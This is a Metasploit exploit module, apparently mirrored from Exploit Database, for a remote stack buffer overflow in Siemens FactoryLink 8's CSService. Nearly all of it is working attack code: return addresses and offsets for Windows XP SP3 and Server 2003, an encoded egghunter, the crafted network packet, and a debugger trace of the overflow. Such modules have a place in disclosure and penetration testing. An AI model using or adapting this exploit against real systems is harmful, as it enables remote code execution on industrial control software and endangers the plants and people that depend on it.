Siemens FactoryLink 8 – CSService Logging Path Parameter Buffer Overflow (Metasploit)

• Exploit Database
• 110 阅读

• 作者： Metasploit
  日期： 2011-06-25
• 类别：

  • remote
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/17450/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163

  ## # $Id: factorylink_csservice.rb 13019 2011-06-25 00:54:18Z sinn3r $ ##   ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ##   require &apos;msf/core&apos;   class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking   include Msf::Exploit::Remote::Tcp include Msf::Exploit::Egghunter   def initialize(info={}) super(update_info(info, &apos;Name&apos; => "Siemens FactoryLink 8 CSService Logging Path Param Buffer Overflow", &apos;Description&apos;=> %q{ This module exploits a vulnerability found on Siemens FactoryLink 8. The vulnerability occurs when CSService.exe processes a CSMSG_ListFiles_REQ message, the user-supplied path first gets converted to ANSI format (CodePage 0), and then gets handled by a logging routine where proper bounds checking is not done, therefore causing a stack-based buffer overflow, and results arbitrary code execution. }, &apos;License&apos;=> MSF_LICENSE, &apos;Version&apos;=> "$Revision: 13019 $", &apos;Author&apos; => [ &apos;Luigi Auriemma <aluigi[at]autistici.org>&apos;,#Initial discovery, poc &apos;sinn3r&apos;,#Metasploit (thx hal) ], &apos;References&apos; => [ [&apos;URL&apos;, &apos;http://aluigi.altervista.org/adv/factorylink_1-adv.txt&apos;], ], &apos;Payload&apos;=> { &apos;BadChars&apos; => "\x00\x80\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8e\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9e\x9f", &apos;StackAdjustment&apos; => -3500, &apos;EncoderType&apos; => Msf::Encoder::Type::AlphanumMixed, &apos;EncoderOptions&apos; => {&apos;BufferRegister&apos;=>&apos;ECX&apos;}, }, &apos;DefaultOptions&apos;=> { &apos;ExitFunction&apos; => "process", }, &apos;Platform&apos; => &apos;win&apos;, &apos;Targets&apos;=> [ [ &apos;Windows XP SP3&apos;, { &apos;Offset&apos; => 965, #Offset to overwrite RETN &apos;Ret&apos;=> 0x7e4456f7,#JMP ESP in USER32.dll &apos;Max&apos;=> 1400,#Max buffer used } ], [ &apos;Windows Server 2003 SP0&apos;, { &apos;Offset&apos; => 965, &apos;Ret&apos;=> 0x77d20738,#JMP ESP in USER32.dll &apos;Max&apos;=> 1400, } ] ], &apos;Privileged&apos; => false, &apos;DisclosureDate&apos; => "Mar 25 2011"))   register_options( [ Opt::RPORT(7580) ], self.class) end   #User input will get converted back to ANSCI with WideCharToMultiByte before vsprintf def to_unicode(text) output = &apos;&apos; (text.length).times do |i| output << text[i,1] << "\x00" end return output end   def exploit   #Modify payload #XP = Align EAX 0x3a bytes.Win2k3SP0 = 0x0a bytes p= "\x57"#PUSH EDI p << "\x59"#POP ECX p << ((target.name =~ /server 2003/i) ? "\xb0\x0a" : "\xb0\x3a") p << "\x30\xc1"#XOR CL,AL p << payload.encoded   #Meterpreter tends to fail because of it being mangled.We use an egghunter #instead to ensure the payload&apos;s integrity. egg_options = { :checksum => true, :eggtag => "W00T", }   egghunter, p = generate_egghunter(p, payload_badchars, egg_options)   #x86/alpha_mixed egghunter alpha_encoder = framework.encoders.create("x86/alpha_mixed") alpha_encoder.datastore.import_options_from_hash( {&apos;BufferRegister&apos;=>&apos;ESP&apos;} ) egghunter = alpha_encoder.encode(egghunter, nil, nil, platform)   sploit= &apos;&apos; sploit << make_nops(4) sploit << p sploit << rand_text_alpha(965-sploit.length) sploit << [target.ret].pack(&apos;V*&apos;) sploit << egghunter   sploit << rand_text_alpha(target[&apos;Max&apos;]-sploit.length) sploit = to_unicode(sploit)   pkt= "\x00\x00\x4c\x45\x4e\x00\x40\x0b\x00\x00\x00\x00\x00\x00\x99\x00\x00\x00\x04\x00" pkt << "\x00\x00\x01\x07\x00\x00\x0b\x31\x99\x62\x72\x6b\x01\x00\x00\x00\x02\x04\x00\x00" pkt << "\x00\x04\x00\x00\x00\x01\x07\x00\x00\x0b\x19\x99\x00\x00\x00\x06\x00\x00\x00\x03" pkt << "\x06\x00\x00\x0a\xf6\x11\x22\x33\x44" pkt << sploit pkt << "\x00\x00\x06\x00\x00\x00\x06\x11\x22\x33\x44\x00\x00\x04\x00\x00\x00\x04\x00\x00" pkt << "\x00\x01\x99\x99\x99"   print_status("Sending malicious request to remote host...")   connect sock.put(pkt) handler select(nil, nil, nil, 6) disconnect end end   =begin 0:000> g call vsprintf. Destination=0x0012ead0 Format=0x0043b92c Args=0x0012eedc eax=0012eedc ebx=7c809a99 ecx=0043b92c edx=0012ead0 esi=0012eee8 edi=00000002 eip=0040b908 esp=0012eac4 ebp=0012fabc iopl=0 nv up ei pl nz na po nc cs=001bss=0023ds=0023es=0023fs=003bgs=0000 efl=00000202 CSService+0xb908: 0040b908 ff15249b4400calldword ptr [CSService+0x49b24 (00449b24)] ds:0023:00449b24={msvcrt!vsprintf (77c3fe49)}   0:000> dc 0012ead0 0012ead065535343 63697672 43203a65 47534d53CSService: CSMSG 0012eae073694c5f 6c694674 525f7365 2d205145_ListFiles_REQ - 0012eaf06f685320 72694477 2c303d73 6c694620 ShowDirs=0, Fil 0012eb003d726574 6150202c 613d6874 61616161ter=, Path=aaaaa 0012eb1061616161 61616161 61616161 61616161aaaaaaaaaaaaaaaa 0012eb2061616161 61616161 61616161 61616161aaaaaaaaaaaaaaaa 0012eb3061616161 61616161 61616161 61616161aaaaaaaaaaaaaaaa 0012eb4061616161 61616161 61616161 61616161aaaaaaaaaaaaaaaa   =end